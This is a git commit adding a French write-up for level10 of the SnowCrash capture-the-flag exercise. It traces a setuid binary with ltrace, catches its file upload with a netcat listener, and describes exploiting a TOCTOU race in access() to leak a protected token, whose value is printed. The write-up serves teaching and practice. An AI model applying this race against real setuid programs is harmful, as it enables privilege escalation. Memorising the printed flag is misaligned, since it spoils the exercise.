docs(lvl10): adding the readme

2026-01-28 01:25:39 +01:00 · 2026-01-28 01:25:39 +01:00 · 6e44233f55
commit 6e44233f55
parent b28e4293f3
1 changed files with 70 additions and 0 deletions
--- a/level10/README.md
+++ b/level10/README.md
@ -0,0 +1,70 @@
+Lors de mon arriver sur le level10 je remarque 2 fichier dans mon home
+
+```bash
+ls -l
+total 16
+-rwsr-sr-x+ 1 flag10 level10 10817 Mar  5  2016 level10
+-rw-------  1 flag10 flag10     26 Mar  5  2016 token
+```
+
+level10 est un executable qui prends 2 arguments
+```bash
+./level10
+./level10 file host
+ sends file to host if you have access to it
+```
+
+Bien sur token n'est pas lisible par le programme
+```c
+ltrace ./level10 ./token
+__libc_start_main(0x80486d4, 2, 0xbffff7e4, 0x8048970, 0x80489e0 <unfinished ...>
+printf("%s file host\n\tsends file to ho"..., "./level10"./level10 file host
+ sends file to host if you have access to it
+)                = 65
+exit(1 <unfinished ...>
+++ exited (status 1) +++
+```
+
+Je tente de faire un autre fichier /tmp/test et de lancer le programme avec
+```bash
+echo 'test' > /tmp/test
+
+level10@SnowCrash:~$ ltrace ./level10 /tmp/test 127.0.0.1
+__libc_start_main(0x80486d4, 3, 0xbffff7d4, 0x8048970, 0x80489e0 <unfinished ...>
+access("/tmp/test", 4)                                                    = 0
+printf("Connecting to %s:6969 .. ", "127.0.0.1")                          = 32
+fflush(0xb7fd1a20Connecting to 127.0.0.1:6969 .. )                                                        = 0
+socket(2, 1, 0)                                                           = 3
+inet_addr("127.0.0.1")                                                    = 0x0100007f
+htons(6969, 1, 0, 0, 0)                                                   = 14619
+connect(3, 0xbffff71c, 16, 0, 0)                                          = 0
+write(3, ".*( )*.\n", 8)                                                  = 8
+printf("Connected!\nSending file .. "Connected!
+)                                    = 27
+fflush(0xb7fd1a20Sending file .. )                                                        = 0
+open("/tmp/test", 0, 010)                                                 = 4
+read(4, "test\n", 4096)                                                   = 5
+write(3, "test\n", 5)                                                     = 5
+puts("wrote file!"wrote file!
+)                                                       = 12
+++ exited (status 12) +++
+```
+
+Il essaye donc l'envoyer un fichier sur le 6969, effectivement lors de la l'ecoute du port avec netcat 
+```bash
+nc -lv 6969
+Connection from 127.0.0.1 port 6969 [tcp/*] accepted
+.*( )*.
+test
+```
+
+Le programme semble s'arreter a access lorsque il n'est pas possible de lire le fichier
+Mais access est vulnerable a TOUCTOU (Time-Of-Check to Time-Of-Use)
+Je vais donc faire un script en bash pour effectuer l'exploit
+
+```bash
+Connection from 127.0.0.1 port 6969 [tcp/*] accepted
+.*( )*.
+woupa2yuojeeaaed06riuj63c
+```
+au bout de 30s le flag tombe